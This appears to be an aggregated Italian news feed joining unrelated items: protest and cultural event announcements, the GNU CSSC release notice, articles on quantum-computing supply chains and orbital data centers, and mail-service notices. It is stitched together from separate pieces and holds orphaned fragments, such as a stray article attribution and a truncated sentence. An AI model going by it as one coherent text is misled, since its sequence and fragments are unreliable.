Il passaggio delle imbarcazioni ha rappresentato simbolicamente questi temi e queste lotte: l'attraversamento del porto nelle vicinanze delle aree interessate dalle richieste di Drass e il successivo percorso lungo il Canale dei Navicelli, che costeggia Camp Darby e lungo il quale transitano carichi militari diretti verso diversi luoghi di oppressione e conflitto, compresa la Palestina.
Oggi abbiamo scelto di muoverci lungo le rotte delle armi per ribadire il nostro dissenso verso il riarmo, la militarizzazione dei territori e la guerra, e per riaffermare il nostro sostegno al popolo palestinese. Una mobilitazione che continuerà e che sarà ancora più forte, qualora proseguano i processi di militarizzazione del porto e del territorio.



L'articolo SEO on-page: checklist aggiornata per ottimizzare ogni pagina del sito proviene da FullPress.
Una serata di danza, arte e trasformazione
Tre quadri, nove performance e decine di artiste in scena per raccontare la forza della rinascita femminile. Domenica 21 giugno il Teatro del Borgo di Milano ospita “Donne in Rinascita”, la rassegna di Metiss’Art dedicata al valore delle donne attraverso la danza e la ricerca artistica.
Milano 17 Giugno 2026 – La rassegna di danze etniche e danze di ricerca ideata e realizzata dalle insegnanti e dalle allieve di Metiss’Art propone una riflessione artistica sul percorso di crescita, consapevolezza e trasformazione delle donne attraverso il linguaggio universale della danza.
–

–
In un momento storico in cui il tema dell’empowerment femminile è sempre più centrale nel dibattito culturale e sociale, la rassegna offre uno spazio di espressione e condivisione dove il corpo diventa strumento di racconto, memoria e rinascita.
Lo spettacolo si sviluppa in tre quadri narrativi che accompagnano il pubblico in un percorso di crescita e trasformazione. Alle 19.00 prende il via “Conoscere e accogliere”, dedicato alla scoperta di sé e all’accettazione della propria identità. Alle 20.00 è la volta di “Trovare il cammino”, incentrato sulla ricerca della propria direzione e della forza interiore. La serata si conclude alle 21.00 con “Raccogliere i frutti”, celebrazione della maturazione personale e della consapevolezza raggiunta.
Sul palco si alterneranno danze persiane contemporanee, danza orientale, fusion, teatrodanza, FCBD Style, Danza Duende e altre forme espressive che, pur provenendo da tradizioni diverse, condividono la capacità di raccontare l’universo femminile nelle sue molteplici sfaccettature: fragilità e coraggio, radici e cambiamento, ascolto e determinazione.
Particolarmente significativa è la performance “Donne in Rinascita”, che dà il titolo all’intera rassegna e che si ispira a simboli e archetipi femminili legati alla trasformazione e alla rinascita. Un omaggio alla capacità delle donne di rigenerarsi, reinventarsi e costruire nuovi percorsi personali e collettivi.
L’iniziativa vuole inoltre valorizzare il contributo delle donne alla vita culturale della città, promuovendo il dialogo tra generazioni, culture e linguaggi artistici differenti. Attraverso la danza, Metiss’Art propone una visione del femminile come energia creativa, inclusiva e generatrice di cambiamento.
https://www.metissart.org/news/36615/amp-quot-donne-in-rinascita
Teatro del Borgo – Via Giovanni Verga 5, Milano
Biglietti:
Intera rassegna: 20 euro
Singolo quadro: 10 euro
Prenotazioni: info@metissart.org
DONNE IN RINASCITA
Domenica 21 giugno 2026
Dalle ore 19.00 alle ore 23.00
L'articolo Milano celebra il femminile con “Donne in Rinascita” proviene da InfoMilano.news.

This is to announce CSSC-1.5.0-rc3, a beta release.
This is a release candidate for a future stable 1.5.0 release.
There have been 46 commits by 2 people in the 109 weeks since CSSC-1.5.0-rc2.
See the NEWS below for a brief summary.
Thanks to everyone who has contributed!
The following people contributed changes to this release:
Greg A. Woods (1)
Paul Bryce (2)
James Youngman (43)
James
==================================================================
Here is the GNU CSSC home page:
https://gn ... rg/s/CSSC/
Here are the compressed sources and a GPG detached signature:
https://alpha.gnu ... -1.5.0-rc3.tar.gz
https://alpha.gnu ... .0-rc3.tar.gz.sig
Use a mirror for higher download bandwidth:
https://www.gnu.o ... rg/order/ftp.html
Here are the SHA256 and SHA3-256 checksums:
File: CSSC-1.5.0-rc3.tar.gz
SHA256 sum: a78bc23062b11c33a858acd8a08c173ea2957f763f5b7ddb2990c0fee7c71cec
SHA3-256 sum: 20733dd3c517c1bb44c67088b1a208ebf00e1eab4ab21e806bd963869faf918a
Verify the SHA256 checksum with either sha256sum, sha256, or
'shasum -a 256'.
Verify the SHA3-256 checksum with 'cksum -a sha3 -l 256 --base64'
from coreutils-9.8.
Use a .sig file to verify that the corresponding file (without the
.sig suffix) is intact. First, be sure to download both the .sig file
and the corresponding tarball. Then, run a command like this:
gpg --verify CSSC-1.5.0-rc3.tar.gz.sig
The signature should match the fingerprint of the following key:
pub rsa4096 2015-12-24 [SC]
0CF4 E8D8 7159 3224 8428 32B8 88DD 9E08 C5DD ACB9
uid James Youngman <james@youngman.org>
uid James Youngman <jay@gnu.org>
If that command fails because you don't have the required public key,
or that public key has expired, try the following commands to retrieve
or refresh it, and then rerun the 'gpg --verify' command.
gpg --locate-external-key james@youngman.org
gpg --recv-keys 88DD9E08C5DDACB9
wget -q -O- 'https://savannah. ... SC&download=1' | gpg --import -
As a last resort to find the key, you can try the official GNU
keyring:
wget -q https://ftp.gnu.o ... u/gnu-keyring.gpg
gpg --keyring gnu-keyring.gpg --verify CSSC-1.5.0-rc3.tar.gz.sig
This release is based on the CSSC git repository, available as
git clone https://https.git ... .org/git/CSSC.git
with commit 26add75e45f79cd493409ee2f0c2646849314aad tagged as v1.5.0-rc3.
For a summary of changes and contributors, see:
https://gitweb.gi ... tlog;h=v1.5.0-rc3
or run this command from a git-cloned CSSC directory:
git shortlog 43b5b054701732df7ce24eb59821010c39c60cb6..v1.5.0-rc3
This release was bootstrapped with the following tools:
Autoconf 2.72
Automake 1.17
Gnulib 2026-06-08 88592a2880cf39a2f597cd0294a90d8dd7faa2df
NEWS
* Some typos in error message have been fixed.
* admin now supports combination of -r with -n as well as the
portable combination of -r with -i.
* Support "sccs sact"; the sact program already existed but
could not previously be invoked via the sccs wrapper.
Thanks to Greg A. Woods for this improvement.
* In some places we now prefer "grep -E" to "egrep" in order
to avoid a warning message from GNU grep. Some very old
versions of Unix may not support this option.
* Various C++ portability improvements.
version at which it still supported building with Automake.
Immagine in evidenza rielaborata con IA
La computazione quantistica è una delle tecnologie più discusse degli ultimi anni e l’idea di costruire sistemi di calcolo basati sui fenomeni della fisica quantistica continua ad alimentare aspettative enormi. Eppure il quantum computing resta lontano dall’essere una tecnologia matura. Non soltanto perché molti problemi scientifici devono ancora essere risolti, ma anche perché, al momento, manca una filiera industriale in grado di produrre in modo scalabile, e a costi sostenibili, l’hardware necessario a far funzionare un computer quantistico.
Come si può immaginare, costruire un hardware simile è molto complesso. Servono materie prime rare, chimica avanzata, sistemi criogenici sofisticati, ottica di precisione e componenti prodotti da un numero ristretto di aziende specializzate.
Il problema fondamentale è che un computer quantistico non deve semplicemente “calcolare”. Deve riuscire a “mantenere in vita” stati fisici estremamente fragili e utilizzarli per il calcolo. La grande promessa del quantum computing – sfruttare fenomeni quantistici come la sovrapposizione e l’entanglement per eseguire operazioni impraticabili per i computer tradizionali – dipende infatti dalla capacità di isolare gli effetti quantistici dalle interferenze del mondo esterno. Il problema, come anticipato anche da Heisenberg, è che gli stati quantistici sono incredibilmente instabili. Basta pochissimo per distruggerli: una vibrazione microscopica, una minima interferenza elettromagnetica, una variazione termica impercettibile. Questo significa che la prima e principale sfida da affrontare per produrre un computer quantistico è quella di costruire una specie di guscio che isoli il processo di calcolo dal “rumore” dell’ambiente esterno.
Una delle interferenze più difficili da controllare è il calore. Per questo molti computer quantistici – in particolare quelli basati su circuiti superconduttori, una delle architetture oggi più sviluppate da aziende come IBM e Google — operano a temperature vicinissime allo zero assoluto, inferiori persino a quelle dello spazio profondo. Per raggiungerle servono sofisticati sistemi criogenici chiamati dilution refrigerator (refrigeratore a diluizione): strutture metalliche, simili a candelabri barocchi, che sono diventate una delle immagini simbolo del quantum computing.
Uno degli elementi chiave per il funzionamento di questi refrigeratori è invece l’elio-3. Rarissimo sulla Terra, l’elio-3 è un isotopo in proporzione più abbondante sulla superficie lunare, dove si è accumulato per miliardi di anni a causa del bombardamento del vento solare. I depositi di elio-3 diffusi nella regolite lunare alimentano da decenni miti tecnologici su future miniere sulla Luna che oggi, nell’era del “capitalismo spaziale”, paiono meno fantascientifici di un tempo. E del resto si può facilmente immaginare come un eventuale aumento della domanda di questo isotopo, connessa alla crescita del quantum computing, potrebbe rendere ancora più allettante l’avvio di attività estrattive lunari. Nell’attesa, gran parte dell’elio-3 disponibile sul nostro pianeta deriva indirettamente dal decadimento del trizio prodotto nei vecchi programmi nucleari militari, creando così un cortocircuito tra una tecnologia di frontiera e i residui industriali della guerra fredda.
Questa dipendenza da materie prime estremamente specializzate rende la filiera dei refrigeratori a diluzione molto fragile. A produrre queste macchine, infatti, sono pochissime aziende al mondo. La finlandese Bluefors, per esempio, è diventata in pochi anni uno dei principali fornitori dell’industria quantistica globale, ma anche uno degli snodi più delicati dell’intera catena produttiva. Se oggi si osserva la struttura industriale del quantum computing, ci si accorge infatti che il settore assomiglia meno all’industria informatica classica e più a un ecosistema di nicchie iperspecializzate, dove pochi attori controllano componenti essenziali e difficilmente sostituibili.
Un ulteriore problema del quantum computing è che, almeno per ora, non esiste un’unica architettura dominante. Coesistono approcci diversi, ciascuno dei quali richiede infrastrutture, materiali e competenze specifici. Se i computer quantistici basati su circuiti superconduttori richiedono criogenia avanzata, i computer quantistici basati sugli “ioni intrappolati” dipendono invece da laser ad altissima stabilità, vuoto ultra-spinto e componenti fotonici delicatissimi. Altri approcci ancora – come quelli basati sui qubit fotonici o sugli atomi neutri (atomi privi di carica elettrica controllati tramite laser) – richiedono invece fibre e circuiti ottici a bassissima perdita, sorgenti luminose avanzate, specchi e cavità ottiche ad altissima qualità e, in alcuni casi, dispositivi microfabbricati costruiti con tolleranze estremamente ridotte.
Questo significa che, al momento, non esiste una singola frontiera industriale del quantum, ma molte frontiere sovrapposte. Per certi versi, la situazione ricorda alcune fasi iniziali dell’elettronica e dell’informatica del dopoguerra, quando convivevano tubi a vuoto, relè, transistor, memorie magnetiche e soluzioni architetturali diverse. Al tempo, l’industria elettronica era quindi un ecosistema frammentato, popolato da soluzioni incompatibili e processi produttivi difficili da standardizzare. La crescita esplosiva del settore arrivò solo quando emersero componenti, architetture e processi produttivi condivisi, capaci di trasformare dispositivi sperimentali in prodotti scalabili. È una lezione storica importante anche per il quantum computing.
Oggi il settore si trova ancora in una fase pre-standardizzazione: nessuno sa davvero quale architettura diventerà dominante, quali materiali saranno indispensabili o quali componenti potranno essere prodotti industrialmente su larga scala. E finché questa convergenza non avverrà, la computazione quantistica rischia di rimanere in un limbo “proto-industriale”, in cui ogni laboratorio tende a costruire il proprio ecosistema tecnologico come una specie di artigianato scientifico avanzatissimo.
La conseguenza di questo fatto è che molti processi produttivi necessari dipendono dall’esperienza accumulata da piccoli gruppi di tecnici altamente specializzati e sono, al momento, difficili da riprodurre serialmente.
La costruzione di un refrigeratore a diluzione, per esempio, richiede tecnici capaci di assemblare manualmente sistemi criogenici estremamente delicati, minimizzando vibrazioni, dispersioni termiche e impurità microscopiche. Si tratta di processi che dipendono ancora da forme di conoscenza pratica accumulate negli anni più che da standard industriali codificati. Dinamiche simili esistono anche nel campo dei semiconduttori avanzati e della litografia estrema. ASML, l’azienda olandese che produce le macchine EUV utilizzate per realizzare i chip più sofisticati al mondo, dipende a sua volta da una rete ristrettissima di fornitori iper-specializzati che, a loro volta, si avvalgono dell’esperienza di pochissimi “super-esperti” in singoli problemi tecnici altamente specifici.
Il vero collo di bottiglia “industriale” della computazione quantistica non riguarda solo le macchine, i materiali o la fisica, ma anche – e forse soprattutto – la disponibilità di talento tecnico adeguato alla portata della sfida produttiva che il quantum computing rappresenta. Per costruire un computer quantistico non basta infatti disporre di buoni fisici teorici o di eccellenti ingegneri. Serve la capacità di integrare competenze molto rare e diverse tra loro: criogenia estrema, scienza dei materiali, ottica avanzata, microfabbricazione, elettronica a radiofrequenza, software di controllo, vuoto ultra-spinto, chimica ultrapura. E soprattutto serve farlo in modo coordinato, continuo e riproducibile. La vera difficoltà non è solo inventare una tecnologia funzionante, ma costruire una massa critica di persone capaci di trasformarla in un sistema industriale.
Per questo il futuro “industriale” del quantum computing è anche un gigantesco problema di scala umana. Non basta avere qualche centinaio di ricercatori eccellenti sparsi nel mondo accademico. Affinché la tecnologia diventi industriale servono migliaia di tecnici, ingegneri e operatori altamente qualificati distribuiti lungo filiere produttive estremamente sofisticate (un fatto che la Cina sembra aver compreso prima di tutti). Servirà cioè trasformare competenze oggi quasi artigianali in capacità industriali diffuse.
La scienza alla base di tecnologie importanti può certamente nascere da un piccolo gruppo di persone eccezionalmente dotate, ma un’industria richiede la capacità di riprodurre sistematicamente quel livello di competenza su larga scala. Ancora una volta ci si può rivolgere alla storia della microelettronica per capirlo. Il vero salto nella produzione seriale di hardware informatici non avvenne infatti quando un gruppo di pionieri ai Bell Labs inventò i transistor, ma quando gli Stati Uniti cominciarono a formare enormi quantità di ingegneri in grado di capire come funzionavano e come si potevano migliorare transistor e circuiti integrati.
In questo senso la vera sfida per il futuro della computazione quantistica non è soltanto costruire una macchina capace di funzionare. È costruire le condizioni industriali, economiche e umane per trasformare una tecnologia sperimentale fragile in un’infrastruttura produttiva stabile.
L'articolo La sfida industriale dei computer quantistici proviene da Guerre di Rete.
Sebbene il numero di casi d’uso nel nostro Paese sia ancora molto basso, le previsioni di tutti gli esperti dicono che gli agenti AI diventeranno i veri “operatori” dell’automazione dei processi in azienda. Il problema è che chi dovrà gestirne la sicurezza non ha ancora l’esperienza necessaria per farsi un quadro chiaro di come questi […]
L'articolo Zscaler porta la Zero Trust nell’era degli agenti AI proviene da Securityinfo.it.



Iniziativa culturale "Articolo 11 – L'Italia ripudia la guerra", in programma il prossimo 18 giugno alle ore 19:30 presso il Teatro Officina Refugio, nel quartiere Venezia di Livorno.
L'evento prevede la proiezione del documentario realizzato da Simona Tarzia e Fabio Palli, che affronta il tema dei conflitti contemporanei attraverso l'analisi dei flussi commerciali globali, della logistica portuale e delle dinamiche economiche che accompagnano e sostengono gli scenari di guerra.
La serata sarà arricchita da un momento di confronto con la partecipazione di:
Fabio Palli e Simona Tarzia, autori del documentario;
José Nivoi, CALP Genova e Coordinamento Nazionale Porti USB;
Alessio Biondi, Coordinamento Nazionale Porti USB;
Mario Spallino, fondatore Teatro Emergency.
Giovedì 18 giugno 2026 – ore 19:30
Teatro Officina Refugio
Scali del Refugio, Quartiere Venezia – Livorno
Proiezione del documentario "Articolo 11 – L'talia ripudia la guerra"
A seguire dibattito con gli autori.
Ingresso libero.
In allegato la locandina con tutte le info.



Musica, cinema, spettacoli, incontri, laboratori e iniziative all’aperto.
Con la bella stagione ritorna uno degli eventi culturali
più interessanti della zona nord-est di Milano: il NAMA Summer Festival 2026,
in programma dal 12 giugno al 12 luglio al Parco della Martesana.
Dopo l’ottimo riscontro ottenuto dalla prima edizione, la manifestazione si amplia e diventa una rassegna diffusa capace di animare diverse aree del parco con un programma pensato per favorire cultura, condivisione e partecipazione.
L’iniziativa è organizzata da NAMA – Nuovo Anfiteatro Martesana con il patrocinio del Municipio 2 e il supporto del Crowdfunding Civico del Comune di Milano.
LOCATION
Il centro del festival è il Nuovo Anfiteatro Martesana, situato all’interno del Parco Martesana, tra via Valtorta e largo Martiri della Libertà Iracheni Vittime del Terrorismo.
Negli ultimi anni quest’area verde è diventata uno dei principali
punti di riferimento per la vita culturale della città.
Trenta giorni di eventi a ingresso libero
La manifestazione propone 31 giorni consecutivi di appuntamenti,
ideati per coinvolgere persone di tutte le età e valorizzare uno dei parchi più frequentati di Milano.

Il calendario prevede:
concerti e musica dal vivo;
dj set e serate dedicate alla scena elettronica;
proiezioni di cinema all’aperto;
incontri e approfondimenti culturali;
workshop e attività creative;
esposizioni e mostre;
iniziative sportive e dedicate al benessere;
laboratori per bambini e famiglie;
spettacoli teatrali e performance artistiche.

L’obiettivo è offrire occasioni di incontro e rendere la cultura sempre più accessibile,
favorendo la partecipazione della comunità locale.
APPUNTAMENTI ATTESI
Tra gli eventi già confermati figurano diverse serate dedicate alla musica elettronica e alla cultura clubbing milanese.
Ad aprire il festival è stato l’evento Botellon,
che ha dato il via alla stagione estiva del NAMA con musica e intrattenimento all’aria aperta.
Tra i momenti più attesi c’è anche il Toy Tonics Summer Jam, in programma il 20 giugno:
una giornata interamente dedicata alla house e all’italo disco con la partecipazione di dj internazionali, food truck, attività outdoor e accesso gratuito all’area open air del festival.
Il programma comprende inoltre incontri culturali, iniziative dedicate al benessere e momenti di aggregazione che accompagneranno il pubblico fino alla conclusione del 12 luglio.
ACCESSO GRATUITO
Uno dei punti di forza del NAMA Summer Festival è la sua accessibilità.
Tutte le iniziative all’aperto sono gratuite e aperte a tutti.
Per alcuni appuntamenti ospitati negli spazi interni o nel cosiddetto “Giardino Nascosto” potrebbe invece essere necessario possedere la tessera associativa NAMA,
richiedibile tramite registrazione online.
L’edizione 2026 rappresenta anche un importante esempio di partecipazione cittadina.
La raccolta fondi promossa per sostenere il festival ha coinvolto circa 960 sostenatori, ottenendo uno dei risultati più rilevanti tra i progetti finanziati attraverso il Crowdfunding Civico del Comune di Milano.
In una Milano che nei mesi estivi tende a svuotarsi, il NAMA Summer Festival propone un’alternativa ai grandi eventi a pagamento. Musica, cinema, attività culturali e spazi verdi si fondono in un format pensato per creare relazioni e mantenere vivo il quartiere della Martesana anche durante l’estate.
Per chi è alla ricerca di qualcosa da fare a Milano tra giugno e luglio senza spendere nulla, il NAMA Summer Festival si conferma come uno degli appuntamenti più interessanti da inserire in agenda.
L'articolo NAMA Summer Festival: un mese di appuntamenti gratuiti nel cuore della Martesana proviene da InfoMilano.news.





La prossima edizione del Workshop GARR - Net Makers si tiene dal 3 al 5 novembre 2026 presso l’Università Roma Tre, nel Dipartimento di Lettere.

È stato pubblicato il Compendium GÉANT 2025, il report annuale che raccoglie dati, analisi e approfondimenti sulle reti nazionali per la ricerca e l’istruzione (NREN) in Europa.
[ITA] Un recente (circa 10 giorni fa) aggiornamento dei nostri servizi di posta pare stia causando dei problemi con alcuni account, in combinazione con Thunderbird. I sintomi variano: non si vede più l’elenco dei folder, oppure lo si vede, ma non compaiono i messaggi nuovi – può sembrare che non stiate più ricevendo posta.
La posta sta venendo consegnata regolarmente! Il problema è nell’interazione con i client. I messaggi nuovi si possono vedere, per esempio, utilizzando la webmail.
Stiamo indagando per risolvere il problema.
[ENG] It appears that a recent (about 10 days ago) major upgrade of our email systems is causing some issues to a subset of users, primarily when using Thunderbird as their email client. Symptoms vary: TB might stop showing the list of folders, or perhaps it will show it, but then the INBOX folder will not display new messages. It might look like you’re no longer receiving any email.
Email is being delivered without issues! The problem is with the client. You can, for example, access new messages by using the webmail.
We’re investigating to attempt to resolve this issue.
AGGIORNAMENTO / UPDATE
[ITA] Si può temporaneamente aggirare il problema, per chi usa Thunderbird, disabilitando la compressione IMAP (RFC 4978) andando nelle impostazioni avanzate ed impostando la variabile mail.server.default.use_compress_deflate a false.
[ENG] It is possible to temporarily work around the issue for Thunderbird users, by going into the advanced settings, looking for the mail.server.default.use_compress_deflate variable, and setting it to false.
AGGIORNAMENTO 2 / UPDATE 2
[ITA] Dovremmo essere riusciti a mitigare il problema lato server, nessuna modifica al client è più necessaria.
[ENG] We think we have mitigated the issue server-side, so no client changes should be necessary anymore.

Immagine in evidenza rielaborata con Intelligenza Artificiale
I data center divorano l’1,5% dell’elettricità mondiale. Per la precisione: 415 terawattora nel 2024. L’equivalente di quasi l’intero consumo annuo di energia elettrica di una nazione come la Francia. Ma è una quota destinata a più che raddoppiare entro il 2030, spinta soprattutto dall’intelligenza artificiale generativa, che l’Agenzia Internazionale dell’Energia identifica come “il fattore più importante” di questa crescita.
Le reti elettriche globali sono già sotto pressione, ma la costruzione di nuove linee di trasmissione richiede dai quattro agli otto anni nei paesi più avanzati. Nel frattempo, la domanda di calcolo aumenta così velocemente che nessuna infrastruttura terrestre riesce a stare al passo.
È in questo contesto che governi e aziende tecnologiche hanno cominciato a guardare allo spazio. Del resto, lo spazio offre energia solare continua senza competere con le reti terrestri, la possibilità di sfruttare il raffreddamento passivo nel vuoto senza consumare acqua e di elaborare i dati direttamente a bordo dei satelliti che li raccolgono, senza doverli trasmettere integralmente a Terra. Quello che sembrava fantascienza è diventato, nel giro di pochi anni, un programma industriale con date, contratti e lanci già effettuati.
A maggio 2025, la Cina ha lanciato i primi satelliti di una costellazione per l’elaborazione dei dati direttamente nello spazio. Nella stessa direzione si stanno muovendo anche gli Stati Uniti. Le due grandi potenze hanno avviato programmi concreti, ancora in parte sperimentali, per portare calcolo e archiviazione oltre il cielo. Si tratta, però, di un salto tecnologico con una conseguenza politica: in futuro, i dati più strategici di governi, eserciti e grandi aziende potrebbero non trovarsi più in nessuna nazione.
I satelliti producono quantità enormi di dati, spesso troppo grandi per essere inviati interamente sulla Terra in tempo reale. Processarli in orbita riduce la latenza e la dipendenza dalle stazioni terrestri. Hewlett Packard Enterprise ha dimostrato la fattibilità di questo approccio con il programma Spaceborne Computer. La multinazionale statunitense, leader nelle soluzioni tecnologiche edge-to-cloud (in cui l’elaborazione dei dati avviene in parte sul dispositivo remoto e in parte sui server centrali), ha installato server commerciali standard sulla Stazione Spaziale Internazionale (ISS) nel 2017, 2021 e 2024. Questo ha permesso di ridurre fino al 90% il volume dei dati da trasmettere a Terra.
In un’intervista a Via Satellite (novembre 2025), Clint Crosier, già responsabile della pianificazione della U.S. Space Force e oggi direttore Aerospace & Satellite Solutions di AWS, ha illustrato i risultati pratici. In un test con la startup italiana D-Orbit, elaborare i dati direttamente a bordo del satellite ha permesso di trasmettere a Terra solo le immagini realmente utili: il satellite ha continuato a soddisfare tutti i requisiti della missione usando il 42% in meno di banda. Liberando quella banda, lo stesso satellite può inviare quasi il doppio dei dati utili senza alcuna modifica all’hardware. Il vantaggio per le applicazioni militari è evidente (non a caso, il Department of Defense Space Strategy statunitense identifica lo spazio come dominio operativo a tutti gli effetti).
Gli Stati Uniti stanno inoltre sviluppando la Proliferated Warfighter Space Architecture (PWSA) della Space Development Agency (SDA): una costellazione di centinaia di piccoli satelliti in orbita bassa interconnessi otticamente. Una flotta progettata per garantire comunicazioni resilienti e rilevamento missilistico anche in caso di attacchi a infrastrutture terrestri. A dicembre 2025, la SDA ha assegnato contratti per circa 3,5 miliardi di dollari per la costruzione di altri 72 satelliti di tracciamento missilistico. La logica strategica è chiara: in uno scenario di conflitto, gli impianti e le installazioni a terra sono tra i primi obiettivi a essere colpiti. Una capacità di calcolo dislocata nello spazio, interconnessa otticamente e ridondante offre invece maggiore sicurezza e una continuità operativa difficilmente replicabile sulla Terra.
Dagli Stati Uniti alla Cina. Come già accennato, il 14 maggio 2025 la Repubblica Popolare ha lanciato i primi 12 satelliti della Three-Body Computing Constellation, sviluppata dall’istituto di ricerca Zhejiang Lab e dall’azienda ADA Space di Chengdu. Ogni satellite offre 744 TOPS (tera-operazioni al secondo) e l’intera rete è progettata per espandersi fino a 2.800 satelliti, con una potenza computazionale complessiva di 1.000 peta-operazioni al secondo, paragonabile per ordine di grandezza ai supercomputer terrestri più potenti. I satelliti sono collegati da link laser inter-satellite (un collegamento che usa fasci di luce laser per trasmettere dati direttamente da un satellite all’altro), alimentati da pannelli solari e raffreddati passivamente dal vuoto, eliminando i costosi sistemi di raffreddamento a liquido dei data center terrestri.
Secondo un piano quinquennale citato dall’emittente televisiva cinese CCTV e ripreso dalla Reuters lo scorso 29 gennaio, la CASC (China Aerospace Science and Technology Corporation) ha annunciato la costruzione di un’infrastruttura digitale spaziale da un gigawatt di potenza, identificata come pilastro del 15° Piano Quinquennale cinese, integrando capacità cloud, edge computing e terminali per elaborare dati direttamente in orbita.
C’è però da osservare che la corsa ai data center orbitali non è più una prerogativa dei governi. A novembre 2025, Starcloud ha lanciato il primo satellite equipaggiato con una GPU NVIDIA H100, realizzando la prima dimostrazione di addestramento AI direttamente in orbita. L’11 gennaio 2026, con la missione Twilight di SpaceX, sono arrivati in orbita i primi due nodi del data center orbitale della statunitense Axiom Space, sviluppati in collaborazione con la canadese Kepler Communications e collegati tramite link ottici da 2,5 Gbps.
Google, con il progetto Suncatcher, punta invece a una costellazione di satelliti dotati di TPU (i processori per l’intelligenza artificiale progettati da Google) alimentati da energia solare, con un primo test, in collaborazione con la società di San Francisco Planet Labs, previsto per il 2027. Secondo indiscrezioni, SpaceX starebbe preparando una generazione aggiornata dei satelliti della sua costellazione Starlink capace di ospitare carichi di calcolo, con link ottici inter-satellite a banda ultralarga.
A rendere economicamente plausibili delle infrastrutture permanenti in orbita è anche la riduzione dei costi di lancio, che – secondo uno studio della NASA – sono passati da circa 54mila dollari al chilogrammo con lo Space Shuttle a 2.700 dollari con il razzo riutilizzabile Falcon 9 della società spaziale di Elon Musk: una riduzione di venti volte in due decenni. Tuttavia, la gestione privata di sistemi potenzialmente critici introduce domande (per ora) senza risposta: a cominciare da chi sia responsabile in caso di violazione dei dati su un satellite commerciale.
Dal canto suo, l’Europa non dispone di un programma comparabile per il cloud orbitale. Il progetto IRIS² – 290 satelliti per comunicazioni sicure, contratto da 10,5 miliardi firmato nel dicembre 2024 con il consorzio SpaceRISE – non include infrastrutture di calcolo orbitale autonome. Sul fronte della ricerca, il progetto europeo ASCEND ha completato nel 2024 uno studio che conferma la fattibilità tecnica dei data center orbitali e si pone l’obiettivo di dispiegare 1 GW entro il 2050. ASCEND è guidato da Thales Alenia Space, joint venture tra Thales e Leonardo: la partecipazione dell’azienda italiana è il contributo più diretto del nostro paese a questo scenario.
C’è poi da notare che D-Orbit, startup comasca già protagonista del test AWS, è tra le realtà italiane più avanzate sul tema dell’elaborazione dati in orbita e ha sottoscritto contratti con l’ESA (l’Agenzia spaziale europea) nell’ambito della costellazione di osservazione IRIDE, finanziata con fondi PNRR. Ma l’Italia non ha un programma nazionale dedicato al cloud orbitale. Il rischio è quello già visto in altri ambiti digitali: competenze industriali elevate senza controllo sull’infrastruttura finale.
Il 24 febbraio 2022, all’ora esatta dell’invasione russa dell’Ucraina, un attacco informatico ha colpito la rete KA-SAT di Viasat (il gigante californiano delle telecomunicazioni satellitari), disabilitando decine di migliaia di modem satellitari in Ucraina e in Europa. Il malware usato – un wiper chiamato AcidRain – non ha violato nessun satellite in orbita, sfruttando invece una vulnerabilità VPN in server di gestione della rete fisicamente localizzati nel nord Italia, propagandosi fino a disabilitare 5.800 turbine eoliche in Germania. A maggio 2022, Stati Uniti, Unione Europea, Regno Unito e una dozzina di governi europei – inclusa l’Italia – hanno attribuito pubblicamente l’attacco al GRU, l’intelligence militare russa.
Il caso Viasat contiene una lezione che vale doppio per i data center orbitali: il punto più vulnerabile di un’infrastruttura spaziale non è il satellite. È tutto ciò che lo gestisce da Terra: stazioni di controllo, reti di uplink, sistemi di autenticazione, catena di fornitura dell’hardware. A questo si aggiunge un problema strutturale specifico dello spazio: il patching. Un data center terrestre può infatti ricevere una patch di sicurezza in pochi minuti. Un satellite in orbita bassa ha finestre di comunicazione limitate, banda ristretta e nessuna possibilità di intervento fisico. Se un sistema orbitale venisse compromesso, la risposta sarebbe strutturalmente più lenta e, in alcuni scenari, impossibile senza un nuovo lancio.
Jamming e spoofing GPS sono già operativi in zona di conflitto e documentati sistematicamente dall’Agenzia europea per la sicurezza aerea (EASA) nel Mar Nero, in Medio Oriente e nel Baltico: dimostrano che l’interferenza deliberata sulle infrastrutture spaziali è una realtà, non un’ipotesi. Un attacco a un sistema orbitale porterebbe le stesse complessità a un livello superiore: chi ha giurisdizione, chi può intervenire, con quali strumenti e in quale tempo utile.
L’Outer Space Treaty del 1967 attribuisce allo Stato di lancio la giurisdizione e il controllo sugli oggetti spaziali, indipendentemente da dove operino. Ma questo trattato non contempla infrastrutture digitali, non regola la proprietà dei dati in orbita, non prevede meccanismi di applicazione in caso di violazione informatica.
A quasi sessant’anni dalla firma, non esiste nessun trattato internazionale che disciplini specificamente la protezione dei dati nello spazio. Nel 2019, dopo otto anni di negoziato, l’UN COPUOS (la Commissione delle Nazioni Unite sull’uso pacifico dello spazio extra-atmosferico) ha adottato 21 linee guida per la sostenibilità a lungo termine delle attività spaziali: volontarie, non vincolanti e relative a detriti, sicurezza operativa e traffico orbitale. La protezione dei dati non è contemplata.
Il primo segnale che la questione stia diventando urgente sul piano normativo è arrivato a gennaio di quest’anno: SpaceX ha depositato all’americana FCC (Federal Communications Commission) una richiesta per lanciare fino a un milione di satelliti definiti esplicitamente “orbital data centers”. Questo è il primo iter normativo al mondo che affronta direttamente il tema, ma riguarda una sola nazione e non tocca le questioni di giurisdizione sui dati.
Payal Arora, professoressa di AI inclusiva all’Università di Utrecht (Olanda), ha sintetizzato il problema in un’analisi pubblicata da Rest of World nel febbraio 2026: se i dati dei cittadini sono elaborati in orbita, la sovranità digitale “diventa ambigua”, sospesa tra il Paese d’origine, lo Stato di lancio e l’operatore commerciale del satellite. Nessuno dei meccanismi esistenti – né il diritto spaziale internazionale, né il diritto cyber nazionale, né i trattati di mutua assistenza giudiziaria – è stato progettato per rispondere a questi aspetti.
Per decenni il potere digitale è stato ancorato a piattaforme fisiche entro confini nazionali. Anche i cavi sottomarini, che trasportano oltre il 95% del traffico internet globale, hanno una giurisdizione di riferimento, con trattati, procedure e responsabilità definite. Il cloud orbitale rompe questo sistema. I dati possono essere archiviati ed elaborati in luoghi che nessuna autorità nazionale può raggiungere, né fisicamente né giuridicamente. In sostanza, per la prima volta, la localizzazione dei dati smette di coincidere con il territorio.
Come spiega Jane Munga, ricercatrice per l’Africa al Carnegie Endowment for International Peace, la sovranità tende a seguire la proprietà dell’infrastruttura: chi non partecipa al suo possesso e alla sua governance rischia di essere relegato a produttore di dati senza alcuna capacità reale di controllo su come siano archiviati, elaborati o usati. Un’incognita che sconfina dal campo dell’innovazione tecnologica. Quello in corso è un passaggio epocale le cui conseguenze sono ancora da scrivere. Il rischio è che si erigano infrastrutture informatiche cruciali per nazioni, imprese e cittadini che superino la sovranità digitale degli Stati. Senza che ci siano le regole per governarle.
